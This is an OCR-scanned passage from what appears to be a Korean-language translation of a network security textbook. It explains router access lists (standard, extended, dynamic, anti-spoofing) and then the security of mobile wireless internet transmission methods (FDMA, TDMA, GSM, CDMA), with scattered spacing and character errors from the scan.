적으로 보면 이 표준접근목록은 응당한 수준의 보안에 필요한 세밀성을 보장하지 못한다. 
그 세 밀도는 1부터 99까지 의 범위 로 정 의 되지만 이 름접 근목록을 사용하여 그 등급을 정 
의할수도 있 다. 이 름을 접 근목록에 리용함으로써 관리 자는 일부 기 입항목이 목록에 서 삭 
제된후에 전체 목록을 다시 만들 필요가 없게 된다. 
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표준접근목록에서 매 기입항목은 매 파케트가 가공될 때 처음부터 끝까지 순차적으 
로 읽허 진다. 그 파케트에 해당한 항목이 나타나면 나머지 접근목록내용은 무시된다. 결 
국 접근목록내용의 순서가 파케트의 해당 가공/경로조정에 매우 큰 역할을 한다. 만약 파 
케트와 접근목록사항사이의 일치가 없으면 목록끝에 도달할 때까지 파케트검사는 계속 
진행되다가 결국 암시적인 《전체 거부》상태에 빠진다. 암시적인 전체 거부는 목록의 
마지막에서 명시적인 전체 허용에 의하여 무시되여 암시적거부를 받은 임의의 파케트를 
경로기를 통과하게 할수도 있다. 이것은 권고할만한 좋은 보안대책이 못된다. 가장 좋기 
는 허용된 파케트들을 위해서는 접근목록에 있는 명시적허용사항을 리용하고 일체 다른 
파케 트들에 대 해서는 암시 적전체 거부를 써서 거부하는것 이 다. 이 렇게 하면 표준접근목 
록의 길이로 보나 복잡성으로 보나 상당히 안전한 실천으로 될것이다. 

표준접근목록을 가장 효과적으로 사용할수 있는 경우는 가상말단접근을 제한시키거 
나 단순망관리규약 ( SNMP ) 접 근을 제 한시키며 망범위 를 려과하려는 요구가 제 기 되는 때 이 
다. 가상말단접 근은 외 부장치 로부터 경 로기 로 원격접 속할수 있는 능력 을 말한다. 망내 부 
에 있는 경 로기 에 원격 접 근하는것 을 제 한하기 위 해 서 는 확장접 근목록을 매 개 의 대 면부에 
적용할수 있다. 이것을 피하기 위해서는 표준접근목록을 적용하여(내부로 들어 오는) 단 
하나의 장치 로부터 의 원격접 근을 제 한할수 있 다. 또한 원격접 근이 일 단 실 현되 면 밖으로 
나가는 대 면부에 표준접 근목록을 적 용하여 모든 외 향적접 근을 제 한할수도 있 다. 

표준접 근목록은 또한 SNMP 접 근을 제 한하는데 도 리용할수 있 다. 자료망에 서 SNMP 
를 리용하면 봉사기 와 경 로기 와 같은 망장치 들을 관리할수 있 다. SNMP 는 망관리 자들이 
사용하는데 공동문자렬 (community stting ) 이 라고 부르는 인증방식 이나 통과암호를 사용하 
여 야 한다. 표준접근목록은 또한 IP 주소들을 제 한하여 SNMP 접근의 경로기통과를 허용함 
으로써 이 강력한 능력 이 외 부에 호출되 는것 을 훨씬 줄이게 한다. 

표준접근목록은 특히 서 로 다른 경 로조정 규약들사이 에 재 분배경 로들이 있는 경우 망 
범위를 려과하기도 한다. 려과하게 되면 초기규약의 경로가 두번째 규약으로 재분배되였 
다가 다시 그 초기규약으로 돌아 오는것 을 막을수 있 다. 즉 표준접 근목록을 사용하면 매 
규약에 분배되 게 된 경 로들을 규제할수 있 다. 

확장 IP 접근목록 

이 름이 보여 주는것 처 럼 확장접 근목록은 표준접 근목록보다 더 강력하여 기 능에 서나 
유연성에 있어서나 훨씬 좋다. 표준접근목록과 확장접근목록들은 둘다 원천지주소에 의 
하여 려과를 한다. 그러나 확장목록은 도착지주소와 상위계층규약정보에 의해서도 려과 
를 진행한다. 확장접 근목록을 쓰면 봉사분야의 종류와 IP 우선권에 의하여 려과를 할수 
있다. 확장접근목록의 또하나의 특성은 사용기록이다. 접근목록의 제일 뒤에 있는 기입항 
목에 있는 LOG 라는 열쇠단어 를 사용하여 접 근목록일 치 사항을 기 록할수 있 다. 이 기능은 
선택 사항이 므로 설정해 주면 기 록내 용을 경 로기 가 지정하는 자료기지설비 에 보낸다. 

경 로기접 근목록을 리용하여 망보안방책 을 수립할 때 에는 몇 가지 주요사항을 잊지 말 
아야 한다. 대면부와의 관계 에서 접근목록을 배 치 할 때 표준접근목록은 될수록 도착지에 
가깝게 놓아야 하며 확장접 근목록은 될수록 원천지에 가깝게 놓아야 한다. 표준접 근목록 


108 




은 원천지 주소만 리 용하여 해 당 파케 트를 거 절 할것 인가 허 용할것 인가를 결정 하기때 문에 
이 목록을 원천지에 너무 가깝게 배치하면 포함되여야 할 파케트들이 막혀 버리는 현상 
이 초래된다. 결국 확장접근목록들을 원천에 될수록 가까이 배치하는것은 이 목록이 표 
준적으로 원천지 IP 주소와 도착지 IP 주소를 다같이 리용하기때문이다. 

강력한 보안방책에 반영되여야 할 내용은 또한 위장을 물리치기 위한 전략이다. 내 
향적접근목록에 《위장방지》접근목록항목들을 첨부하는것은 이러한 전략에 상당히 도움 
이 될것 이 다. 이 위 장방지 기 입 항목들을 리 용하여 외부망의 원천지 주소나 무효원천지 주소 
를 가진 IP 파케트들을 차단할수 있다. 무효원천지주소들의 실례로는 되돌림주소 (loopback 
address ), 다중전송주소 (multicast address ) 및 비 등록주소들을 들수 있 다. 위장은 해커들이 
쓰는 매우 인기 있는 수법이다. 이런 가짜주소들을 사용하여 해커들은 추적을 받지 않으 
면서 공격 을 진행한다. 보안관리자들은 파케 트를 가지 고 이 비 법 주소들을 사용하는 원천 
지 를 추적해 야 소용 없 다. 

동적접근목록 

동적접근목록은 사용자인증과정을 통하여 접근목록에 동적인 빈자리들을 만들어 주 
는 능력 이 있는 접근목록이 다. 지금까지 설명한 모든 접근목록 즉 전통접근목록，표준접 
근목록 및 확장접근목록에 다 이러한 목록기입사항들을 넣을수 있다. 사용자가 인증되고 
사용자가 개시 한 경 로기 에 로의 Telnet 의 접속조종을 경 로기 가 받은 다음에 야 내부에: # 
어 오는 즉 내 향성접 근목록에 동적 기 입 사항들을 만들어 넣 을수 있 다. 이 동적기 입 사항들 
을 리용하여 사용자콤퓨터 의 IP 주소로부터 오는 파케 트들을 허 용해 준다. 동적 기 입 사항 
들은 유휴시간이 경과되거나 최고경과시간이 끝날 때까지 계속 남아 있다. 그러나 이 두 
특성 들은 선택 적 인 항목이 며 일 단 선택해 놓으면 다음번 경 로기 의 재 적재 과정 이 있을 때 
까지 동적기 입사항은 계 속 활성 상태 로 있 게 된 다. 그러 나 시 간경 과파라메터 들을 리용하 
면 중요한 보안조치로 될수 있다. 

동적접근목록을 사용하는것을 잘 계획하여야지 잘못하면 보안상 다른 제한성들을 발 
로시 킬수 있 다. 동적접 근목록의 리용에 서는 한종의 접 근만 가능하며 각이한 준위 의 접 근 
은 제 공되 지 않는다. 또한 접 속조종을 수립할 때 접 속개 시 정 보는 암호화됨 이 없 이 통과 
되 기 때 문에 해 커 들이 엿 보기 도구들을 리용하여 이 정 보에 접 근할수 있게 된 다. 


결 론 


망경 로기보안은 기 관들의 전반적보안계 획 의 사활적 인 구성 요소이 다. 경 로기 보안은 
보안전문가들의 항시적 인 관심을 요구하는 복잡하고도 빨리 발전하는 기술이다. 지금까 
지 이 장에서는 기본적 인 경로기보안특성들의 주요측면들과 그것들을 활용하여 비법공격 
을 막자면 어떻게 해야 하는가에 대하여 보았다. 공격의 위협과 공격의 첨단성이 계속 
증가하고 있음으로 하여 앞으로 보안사업 은 의 심할바없 이 개 선되 고 향상될 것 이 다. 
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제 8 장. 무선인테^트보안 


데니스 쎄이무어 리 


인터네트의 초창기를 되돌아 보느라면 인터네트가 나오게 된 몇가지 리유에 대하여 
다시 생각해 보지 않을수 없다. 그 리유의 일부를 본다면 다음과 갈다. 

• 전 자적 인 정 보공유를 위 한 광범 한 통신매 체 를 제 공하는것， 

• 국부적인 가동중단에도 견덜수 있는 다중통로적인 망을 형성하는것， 

• 각이 한 제 작자와 각이 한 망사이 에서 를퓨터 호상간 대화를 위 한 방도를 제 공하는것. 

당시 상업과 보안(망사용을 위한 노력을 제외하고)에서는 그리 높은 수준의 요구가 
제기되지 않았다. 초창기에 인터네트를 상업적목적에 리용할수 있다는 생각은 거의 없었 
다. 사실 인터네트를 리용하여 봉사를 하고 제품판매를 한다는것은 륜리상 어긋나는것으 
로 생각되였다. 상업활동의 요구와 그 보안상 요구는 최근 몇해사이에 보다 새롭게，강하 
게 제기되고 있는 문제이다. 

이와는 반대로 무선인터네트는 그 첫 시작부터 상업을 기본추동력으로 하여 설계되 
고 있다. 세계의 수많은 나라들과 기관들은 기업유지를 목적으로 수백만 지어는 수십억 
딸라를 들이밀어 기술시설，전송주파수대역，기술，응용프로그람을 구매하고 있다. 일부 
측면에서 보면 이것은 새 천년기의 《질주경쟁》으로 된셈이다. 그렇다면 응당 여기서는 
보안이 처음부터 결정적인 역할을 놀아야 한다. 자금의 이동이 있으니 보안도 그에 맞게 
되여야 한다는것이다. 

비록 무선산업이 아직은 유년기에 있지만 무선인터네트를 위한 장치개발，기초시설 
개발，응용개발은 전 세계적범위에서 급속히 확대되고 있다. 선견지명이 있는 사람들은 
이 초기설계 단계에서 보안이 응당 제 자리를 차지하여야 한다고 볼것이다. 이 장의 목적 
은 이 새로 태여나는 산업에서 반드시 제기되여야 할 주요보안상 문제점들의 일부를 명 
백히 밝히는것이다. 이 문제점들은 무선인터네트봉사나 응용을 도입하려는 기업이 기업 
보안 및 고객보호 그리고 새로운 보안인 무선인터네트에 대한 투자를 보호하는데서 응당 
고려해 야 할 우려들이 다. 

이 장에서 초점은 무릎형콤퓨터와 무선모뎀을 사용하는 인터네트를 분석평가하는것 
이 아니다. 나온지 몇해가 잘된 이 기술은 많은 경우 전통적 인 유선인터네트접근의 확장 
일 따름이 다. 이 장에 서 초점 을 맞추러 고 하는것 은 우선 LAN 이 나 인터네 트 Bluetooth 도 
아니 다(100% 인 터네 트형 도 아니 며 몇개 장을 필요로 하는것 이 므로). 이 장이 기 본적 으로 
설 명하려 고 하는것 은 보통 PC 보다 훨 씬 낮은 콤퓨터능력 을 가진것 으로 원 래 알려 진 이 
동전화와 PDA (개인휴대형정보처리기)와 같은 휴대형인터네트장치들이다. 따라서 이 기구 
들에 서 는 각이한 프로그람언어，규약，암호화기 술，보안안목을 가지 고 여 러 가지 기 술을 
다루어야 할것이다. 그러나 크기가 작고 제한성이 있다 할지라도 이 기구들은 전자상업 
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거래와 현재 설계중에 있는 인트라네트관련응용으로 하여 정보보안에 상당한 영향을 미 
칠것으로 보인다. 

누가 무선인테 II 트를 사용하는가 


수많은 연구자료들과 예측자료들은 오늘 무선인터네트사용자의 수는 이제 곧 수백만 
의 유선인터네트사용자수를 훨씬 초과할것 이 라고 보고 있다. 이 예상수자는 매 일 수천명 
씩 증가하고 있는 전 세계의 이동전화사용자수가 수백만이라는데 기초하고 있다. 만일 
이 이동전화사용자 매 사람이 우선 전화를 통한 인터네트접근을 원한다면 사실 무선인터 
네 트사용자수는 유선 인 터 네 트사용자수의 몇 배 를 넘 을것 이 다. 바로 이 방대 한 잠재 력 이 
있음으로 하여 많은 기업들이 이 장성하는 산업을 독점해 보려고 수많은 자원과 투자를 
아낌없이 투하하고 있는것이다. 

무선인터네트는 아직 매우 청소하다. 무선전화로 인터네트에 접속하지 못하는 이동 
전화사용자들도 많다. 앞으로 제공할 봉사형태들에 대하여 두고 보자는 식의 태도를 가 
지고 있는 사람들도 많다. 무선인터네트접근을 하고 있는 대부분의 사람들은 초기도입자 
들로서 현재 이 무선인터네트봉사의 잠재력을 시험해 보는 사람들이다. 화면이 작고 매 
우 제한된 대역너비인데다 기타 문제들도 있는 무선기구들의 심각한 제한성으로 하여 유 
선및 무선 인 터 네 트사용자들의 대 부분은 오늘 인 터 네 트접 근의 기 본수단인 탁상형 를퓨터 와 
무릎형 콤퓨터 를 이 무선장치 들이 대 신하지 못할것 이 라고 인정 할것 이 다. 무선장치 를 가 
지 고《 인 터 네 트를 한번 득 훑는다는것》은 정 말 실망할 정 도로 힘 든 일 이 라고 모두가 
말한다. 무선 인 터 네 트사용자들중 대 부분이 다음과 같은 실망감을 표시 하였 다. 

• 인터네트에 접속하기에는 너무 속도가 느리다. 

• 움직 이기 시작하면 접속조종중간에서 접속이 끊기기 쉽다. 

• 수자판에서 문장을 타자하기 시끄럽다. 

• 분당으로 사용료를 지불하게 하면 무선인터 네트가 사용하기 에 비싸다. 

• 무선장치들에는 그라픽스현시능력이 너무 적거나 없다. 

• 화면이 너무 작아서 긴 문장을 읽으러면 내 내 내 려갔다올라갔다 해 야 한다. 

• Web 싸이트훑기를 할 때 오유가 많다(주로 대부분의 Web 싸이트들이 오늘날 무 
선인터네 트와 호환성 이 없기때 문에). 

이 글을 쓰는 당시 이 실망감을 주는 내용들중 하나의 례외적인 현상이 어느 한 나 
라에서 나타났다. 정 보통신제공업 체 인 NTTDoCoMo (무선응용규약 즉 WAP 에 대 응되는)는 
i - Mode 라는 무선응용환경 을 리용하여 무선인터네 트가입 자수에서 기 록적 인 장성 을 보았 
다. 이 나라의 많은 사람들에 게 있어서 무선전화를 리 용한 접 속은 인터네 트와의 유일 한 
접근방법 이다. 유선하부시설을 설치하기 곤난한 곳에서는 무선인터 네트접근이 유선접근 
보다 훨씬 값이 눅다. i - Mode 사용자들은 인터네 트무선접속상태를《 언제 나 직결》상태 에 
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있을수 있게 하였으며 이동전화상에 천연색화면 지어 도형과 음악과 동화상까지도 펼칠 
수 있게 되였다. 아마 무선인터네트와 관련한 이 성과는 정확한 요소가 주어 지면 무선 
분야에서 못할것 이 없다는것을 례를 들어 보여 준것 이 라고 해 야 할것 이 다. 

어떤 응용이 가능할것인가 


오늘의 무선기 술의 실 패 요소들과 제 한성 들을 깨 닫고 많은 기 업 체 들은 자기 식 의 무선 
장치들과 무선봉사들을 설계하고 있는데 유선인터 네트접근을 대신하자는것보다도 유선 인 
터네트에서 할수 있는 봉사형태들의 확대판으로 전용봉사를 하자는것이다. 이러한 봉사 
형태들에서 뚜렷이 나타나는 장점은 휴대성정보접근의 편리성이다. 언제 어디서나 콤퓨 
터앞에 마주 앉지 않아도 주머니속에 가지고 다니며 인터네트봉사를 받을수 있게 된것이 
다. 사실 정보는 간명하고 휴대성 있으며 쓸모 있고 접근하기 편리해야 한다. 오늘날 설 
계되 고 있거 나 현재 가능한 무선봉사형 태들은 다음과 같다. 

• 이동전화를 사용한 직결물건사기를 할수 있다. 실지 상점에 들어 가서 상점의 
물건값과 직결가격들을 비교도 할수 있다. 

• 현 주식시세를 알수 있으며 가격정보，무역권한부여，종합정보 등을 어디서나 교 
환할수 있다. 

• 은행거래를 하며 구좌정보를 받아 볼수 있다. 

• 려행계획시간표를 받아 보며 예약할수 있다. 

• 자기가 좋아 하는 새 소식과 날씨예보를 받아 볼수 있다. 

• 최신추첨번호를 받을수 있다. 

• 지급소포의 현 송달상태를 알아 볼수 있다. 

• 전자우편을《쉬지 않고》계속 보내고받고 할수 있다. 

• 재고명세，고객명단 등과 같은 회사의 내부자료기지에 접근할수 있다. 

• 지도상의 방향을 물어 보고 알수 있다. 

• 사용자의 현 위 치로부터 가장 가까운 ATM (자동현금입출기)，식당，극장，상점위 
치들을 알아 낼수 있다. 

• 구급전화번호를 돌리면 구급봉사에서 요청자의 위치를 삼각점으로 추측할수 
있 다. 

• Web 싸이트를 열람하며 동시에 싸이트대표와 실시간적으로 이야기를 주고받을수 
있 다. 

보다 새롭고 보다 혁신적 인 봉사형태들이 현재 추진중이다. 새롭게 태여 나는 기술들 
이 흔히 그러하듯이 무선봉사와 무선응용에 대해서도 희망과 함께 과장도 많으며 일부 
사람들속에서는 위구도 없지 않다. 그러나 기술과 봉사형태들이 시간이 지남에 따라 성 
숙되 여 어제날의 실험 이 래일의 표준으로 될수도 있다. 인터네트는 이렇게 새롭게 나타 
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나는 진보의 커다란 모범이다. 무선인터네트의 발전도 곡 같은 진화론적주기를 거칠것이 
며 그것은 더 빠른 속도로 나아갈것 이 다. 

그러나 그 어느 기술과 마찬가지로 보안과 안전이라는 문제를 시작부터 설계에 정확 
히 포함시키지 않으면 그 기술자체의 평판과 전망에 오점을 남길수 있다. 바로 이러한 
목적을 념두에 두고 이 장을 썼다. 

무선인터네트는 포괄범위가 넓기때문에 그 보안도 포괄범위가 넓다. 이 장에서는 무 
선장치 들에 대 한 통신방법 으로부터 시 작하여 기 술시 설 의 일 부 구성 요소들에 이 르기 까지 
몇 가지 부류에 서 의 무선 인 터 네 트보안문제 들을 다룬다. 

송신방법은 어느 정도 안전한가 


몇 해 동안 사회 적 으로 인식된것 은 상사식 이 동전화전송이 상당히 엿 듣기 쉽 다는것 이 다. 
이것은 상사식이동전화가 리용되기 시작한 때로부터 알려 진 문제였다. 특수한 라지오스 
캔기구를 사용하면 엿듣기 쉽다. 이런 리유로 하여 많은 이동전화봉사제공자들은 수자식 
봉사를 추진하여 상사식을 줄이고 있다. 수자식 이동전화전송은 표준적으로 볼 때 엿듣기 
가 보다 힘들다. 바로 이러한 꼭갈은 수자식전송방식에 새로운 인터네트봉사가 기초하고 
있 는것 이 다. 

그러나 수자식쎌전송에는 하나의 방식만 있는것이 아니다. 사실 오늘날 무선전송방 
식 에 는 여 러 가지 각이한 방식 이 있다. 실례 로 어느 한 나라의 Verizon 과 Sprint 와 같은 봉 
사제 공업체에서는 CDMA (코드 분할다중접근)방식을 사용한다면 AT & T 사에서는 주로 
TDMA (시분할다중접근)방식을 쓰며 VoiceStream 사에서는 GSM (지구적 인 이동통신체계)방 
식 을 리용하고 있다. Cingular 갈은 다른 업 체들에서 는 지 리적위 치 에 따라 하나이상의 방 
법 들 ( TDMA 와 GSM ) 을 사용하고 있 다. 이 모든 방법 들은 라지오주파수사용방식 과 이 주 
파수들을 사용자에게 배당해 주는 방식에서 서로 차이가 있다. 이 장에서는 이 매개 방 
식 들을 보다 구체 적 으로 설 명 한다. 

이 동전화사용자들은 무선인터네 트접 근에 관해 서 는 어 떤 전송방법 이 든 관심 도 없으며 
실 지 관심하려 고 하지 도 않는다. 대 신 대 부분의 사용자들은 자기 가 좋아 하는 무선봉사 
제 공자들을 선택하여 봉사에 가입한다. 봉사제 공자가 어 느 전송방법 을 쓰는가 하는것 은 
일 반적 으로 사용자들에 게 는 잘 알려 지 지 않을 정 도로 투명하다. 그러 나 봉사제 공자에 게 
는 이것이 완전히 다른 문제이다. 어느 방법을 리용하든지 그 방법은 그 기초시설과 상당 
한 관계가 있다. 실례로 라지오설비의 류형，전송탑의 위치와 개수，전송량，가입자들에게 
팔아 주는 이동전화류형 등은 모두 선택된 수자식전송방법과 직접적으로 련관되여 있다. 

주파수분할다중접근 ( FDMA ) 기술 

상사식이든 수자식이든 모든 쎌통신은 무선봉사제공업체가 구매하거나 그에 할당된 
라지 오주파수를 리 용하여 진행 된다. 매 봉사제 공업 체 는 해 당 정 부로부터 라지 오주파수대 
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역 에 대 한 사용허 가를 구매 한다. 

상사식쎌통신은 대체로 주파수분할다중접근(즉 FDMA ) 기술이라고 부르는 방식에 기 
초한다. FDMA 방법 에 서 매 봉사제 공업 체 는 자기 가 할당 받은 라지오주파수대 역 을 개 별 
적 인 주파수통로로 나눈다. 매 통로는 단방향통신대화를 지 원하는 특정 주파수이다. 매 통 
로는 10〜 30 kHz 의 폭을 가지고 있다. 정상적인 쌍방향전화대화를 위해서는 매 이동전화 
사용자에 게 두개 의 주파수통로가 차례 져 하나는 송신에，다른것 은 수신에 쓸것 이 다. 

매 전화가 두개 의 통로(두개 의 주파수)를 차지하므로 전용라지 오 스캔 기 구가 해 당 주 
파수통로에 정확히 동조만 하면 진행중에 있는 상사형전화대화를 엿듣는것은 그리 힘든 
일 이 아니 다. 암호화가 추가되 지 않으면 상사형쎌통신에서 는 사적비밀보호가 거의 불가 
능하다. 

시분할다중접근 ( TDMA ) 기술 

다른 한편 수자식쎌통신에서는 여 러가지 코드화기법 이 리용되는데 그 대부분이 상사 
형라지오주파수스캔에 견디여 낸다(주의 : 무선통신에서 단어 encoding 은 encryption 을 의 
미 하지 않음. 여 기서 encoding 은 신호를 한 형 태 로부터 다른 형 태 로，례 하면 유선신호로 
부터 무선신호로 변환하는것을 의미함-역주). 

이러한 수법들중의 하나가 바로 시분할다중접근 즉 TDMA 이다. FDMA 와 류사하게 
TDMA 는 라지오주파수를 여러개의 30 kHz 주파수(때로는 주파수반송파라고도 함)들로도 
나눈다. 쌍방향통신을 하려면 이런 주파수통로가 두개 있어야 하는데 하나는 보내는 통 
로，다른 하나는 받는 통로로 리용할수 있다. 그런데 TDMA 에서는 보충적으로 매 주파수 
통로를 음성/자료통로라고 하는 3〜6개의 시간소통로로 더 나누어 최고 6가지 수자식음 
성 및 자료회선이 같은 주파수상에서 진행되게 된다. TDMA 봉사제공자들은 FDMA 에 비 
해 볼 때 갈은 시 간에 더 많은 통화를 다룰수 있다. 이것 이 동일한 하나의 주파수에서 
매 시간소통로에 6개의 매 통화를 할당해 주기때문이다. 매 시간소통로(즉 음성/자료통 
토)는 지속시 간이 대 략 7 ms 이 다. 이 시 간소통로들은 빠른 순환으로 계속 순차적으로 송 
신된다. 해당 시간소통로에서 오는 정보들은 접수쎌기지국에서 신속히 추출하고 재조립 
하여 회화나 대화과정이 이어 지게끔 한다. 일단 시간소통로가 통화자에게 할당되면 통 
화가 끝날 때까지 그 통화자에게만 리용된다. TDMA 방법에서는 매 사용자에게 전체의 
한 주파수가 할당되는것이 아니라 다른 사용자들과 함께 공유하여 매 사람에게는 해당한 
시 간소통로가 차례질뿐이 다. 

이 장을 쓰는 현재도 TDMA 전화대화나 자료흐름들은 무선공간으로 날아 가지만 이 
것 들을 도청하였 다고 하는 사건들이 공개 된것 은 많지 않았다. 도청하자면 아마 특수한 
형태의 기구나 시험장치들이 있어야 할것이다. 짐작건대 비법적으로 고쳐 만든 TDMA 이 
동전화도 도청에 리용될 가능성이 있다. 

그러 나 그렇 다고 하여 도청 이 불가능하다는것 은 아니 다. 무선 인 터네 트대 화와 관련 하 
여 이런 대화가 진행되는 전체 경로를 생각해 보라. 

이 동전화사용자가 인터네 트 Web 싸이 트와 통신하자면 무선이 동전화에 서 나오는 무선 
자료신호가 유선신호로 변환되 여 야 인터네 트로 흘러 갈것 이 다. 유선신호로 된 그 정 보는 



해 당 Web 싸이 트에 도착할 때 까지 평 문으로 인터네 트를 종횡 무진할것 이 다. 물론 무선신 
호자체 는 도청 하기 힘 들지 만 일 단 유선신호로 변환되 면 인 터네 트로 흐르는 모든 암호화 
되지 않은 통신들과 곡 갈은 도청위험성 이 있다. 송신방법에는 관계없이 만약 극비정보를 
인 터네 트로 보내 려 고 한다면 처 음부터 끝에 도착할 때 까지 그 대 화전체 를 암호화하는것 
이 필요하다. 암호화에 대 해서 는 후에 구체 적 으로 설명하겠다. 

지구적이동틍신체계 ( GSM ) 

다른 하나의 수자식 전송방법 이 바로 지 구적이 동통신체 계 ( GSM ) 이 다. GSM 이 라는 용 
어 에 는 전송방법 만 담겨 져 있는것 이 아니 다. 이 용어 는 각이한 GSM 봉사로부터 실지 
GSM 설 비 와 기 구자체 에 이 르기 까지 의 쎌전송방식 체 계 전반을 의 미한다. GSM 은 주로 유 
럽나라들에 서 사용된 다. 

일종의 수자식전송방법인 GSM 은 TDMA 의 변종이다. FDMA 나 TDMA 와 류사하게 
GSM 봉사제 공자는 할당된 라지오주파수대 역 을 여 러개의 주파수통로로 나눈다. 이 때 매 
주파수통로는 상당히 넓은 폭인 200 kHz 를 가진다. 다시 FDMA 와 TDMA 와 비슷하게 매 
GSM 이동전화는 두개의 주파수통로 즉 송신통로와 수신통로를 사용하게 된다. 

TDMA 와 같이 GSM 도 매 주파수통로를 음성/자료통로라고 하는 시간소통로로 더 나 
눈다. 그러 나 GSM 에서는 8개의 시 간소통로가 생겨 최 고 8통화의 수자식음성 및 자료통 
신이 같은 주파수내에서 진행된다. TDMA 에서는 일단 그 시간소통로가 통화자에게 배당 
되면 통화가 끝날 때까지 통화전기간 그 사용자에게 전용으로 리용된다. 

GSM 에 는 보안을 강화하는 보충적 인 특징 들이 있 다. 매 GSM 전화에는 가입 자신원모 
둘 ( SIM ) 이 있다. 이 SIM 은 신용카드크기의 스마트카드나 우표크기의 소편과 보기에는 비 
슷하다. 사용할 때 이 외 장 SIM 을 GSM 전화에 끼 워 넣는다. 이 스마트카드나 소편에 는 가 
입 자의 이 동전화번호와 같은 가입 자정 보，인증정 보，암호화열쇠，전화번호목록，가입 자가 
보관한 짧은 통보문들이 담겨 져 있다. 이 SIM 은 꺼냈다넣었다 하는 외장식이므로 이것 
을 서로 다른 GSM 이동전화에도 쓸수 있게 되여 있다. 전화를 쓸 때마다 가입자의 정보 
가 담긴 SIM 을 쓰면 그 가입 자의 전화로 된다. 즉 사용자의 신원은 특정한 어 느 전화에 
달려 있는것이 아니라 그 SIM 자체에 달려 있다. 그러므로 전화번호를 바꾸지 않고도 서 
로 다른 GSM 전화를 사용할수 있거 나 가입 자의 정보를 갱신할수 있다. 또한 다른 나라에 
가면 그 나라의 GSM 주파수가 달라도 GSM 전화를 임 대하여 쓸수 있다. 물론 이것은 매 
나라의 GSM 봉사제 공업 체 들사이 의 봉사호환성 이 있 어 야 한다. 

GSM 전화는 SIM 이 없이는 무용지 물이므로 이 SIM 은 인증도구의 기능도 수행한다. 
일단 SIM 을 전화에 끼워 넣으면 해 당 SIM 과 관련된 개 인식별번호 ( HN ) 를 입력하라는 통 
보문이 나온다 (SIM 이 : RN 을 쓰게 되여 있는 경우). 정확한 Pm 이 입력되지 않고서는 전 
화가 동작하지 않는다. 

해당 전화기에 대한 사용자인증을 할뿐아니 라 이 SIM 은 또한 접속할 때 이 전화기 
를 전화망자체 에 인증시키 는 역 할도 수행한다. SIM 에 있는 인증(즉 Ki ) 키 를 사용하면 전 
화기 는 매 통화마다 봉사제 공자의 인증쎈 터 에 인증을 등록한다. 이 과정 은 문제 -대응기 
법 을 리용하는것 으로 되는바 이것은 어떻 게 보면 PC 를 원격망에 접 속할 때 통표카드를 
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쓰는것파 류사하다. 

SIM 이 들어 있는 키들은 인증외에도 또 다른 하나의 기능을 가지고 있다. SIM 카드 
가 생 성하는 암호화(즉 Kc ) 키 를 쓰면 이 동전화와 봉사제 공자의 송신설 비 사이 의 통신을 
암호화함으로써 비밀성을 보장할수 있다. 이 암호화수법을 쓰면 이 두 지점사이에서 도 
청을 막는다. 

TDMA 와 류사하게 도 이 GSM 송신방법 에서 는 라지오주파수스캔기 구로 도청하기 매 
우 힘들다. 하나의 주파수를 최고 8명의 사용자가 쓰므로 수자신호를 추출하기 어렵다. 
SM 카드를 리용하여 암호화까지 하면 GSM 은 도청방지 용으로 다른 한개 의 보안층을 추 
가하는셈 이 다. 

그러 나 무선인터네 트대화에 관하여 이 야기 한다면 이 런 형 태의 암호화는 말단 대 말단 
사이 의 보호가 되 지 못한다. 경 로의 일부만 실지 보호될수 있 다. 이 것은 TDMA 인터네 트 
대 화과정 에 서 이 미 설 명한것 과 류사한 문제 이 다. 전형 적 인 무선 인 터네 트대 화는 무선경 로 
도 있고 유선경로도 있다. GSM 암호화는 다만 이동전화와 봉사제공자의 전송장소사이의 
구간인 무선구간만 보호 한 다. 봉사제 공자의 전송설 비 에서 인터네 트 Web 싸이트까지 의 유 
선인터네 트의 구간은 평 문으로 전송하는것 으로 된다. 말단 대 말단암호화를 하면 전체 
인 터네 트대 화과정 의 비 밀은 보장될 것 이 다. 

쿄드분할다중접근 ( CDMA ) 기술 

수자식전송방법에는 코드분할다중접근 ( CDMA ) 이라는 방법도 있다. CDMA 는 확산스 
펙 트르에 기 초하고 있 다. 이 기 술은 라지오통신의 도청 과 장애 를 극복하기 위하여 군부 
가 오래 동안 사용해 온 기 술이 다. Qualcomm 회 사는 이 CDMA 확산스펙 트르기 술을 쎌 방식 
의 전화에 도입한 주요개 발자의 하나이 다. 

라지오주파수대역을 여러개의 좁은 주파수대역으로 혹은 시간소대역으로 나누지 않 
고 이 기술에서는 역시 주파수통로라고 하는 그 라지오주파수대역의 매우 넓은 부분을 
그대로 리용한다. 그 주파수통로는 너비가 1.25 MHz 나 된다. 쌍방향통신을 위하여 매 이 
동전화는 송신과 수신에 각각 하나씩 두개의 이러한 넓은 CDMA 주파수통로를 쓴다. 

통신을 할 때 매 음성 혹은 자료대화는 처음에 여 러 자료신호로 변환된다. 다음 그 
신호들에 해 당 통화자소속관계 를 밝히 는 고유코드로 딱지 를 붙인다. 이 코드를 허위불규 
칙소음 ( PN ) 코드라고 한다. 매 이 동전화는 매 대 화시 작때 기 지 국에 서 새 로운 PN 코드를 할 
당 받는다. 이 코드화된 신호들은 매 우 넓 은 라지오주파수대 역 에 산포되 여 전송된 다. 통 
로너 비 가 매 우 크기 때 문에 이 통신 방법에 는 해 당 통화자소속표시 인 PN 이 붙은 많은 다 
른 대 화들도 동시 에 처 리할수 있는 능력 이 있다. 

CDMA 전화는 수신할 때 해 당 PN 코드를 리용하여 자기 에 게 오는 신호들만 골라 내 
고 나머 지 는 다 무시한다. 

CDMA 방식에서는 기지국과 통신하는 이동전화들이 모두 득같이 넓은 주파수들을 공 
유한다. 매 통화자를 구별해 주는것 은 ( FDMA 에서처 럼) 사용하는 주파수도 아니며 해 당 
주파수내의 시간소통로로가 아니라 ( TDMA 나 GSM 과 같이) 바로 그 통화자에게 할당된 
PN 소음코드이다. CDMA 방식에서 하나의 음성/자료통로는 고유 PN 코드가 붙은 자료신호 
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이다. 

하나의 CDMA 방식 의 대 화를 도청하는것 은 힘 들것 이 다. 그것 은 그 수자식신호들이 
매 우 넓 은 라지오주파수대 역 들에 널려 있기때 문이 다. 대 화는 어느 한 주파수에만 머물러 
진행하는것 이 아니 므로 스캔하기 가 매 우 힘 들다. 또한 PN 소음코드를 알지 못하고서 는 그 
렇 게 많은 주파수에 서 해 당 대 화만 추출해 낸 다는것 은 불가능하다. 도청 이 더 욱 불리해 
지는것은 그 전체 통로대역에서 수많은 다른 통화자들이 동시에 대화를 하기때문이며 어 
느 한 통화를 도청하자면 굉 장한 량의 소음을 극복해 야 하기 때 문이 다. 

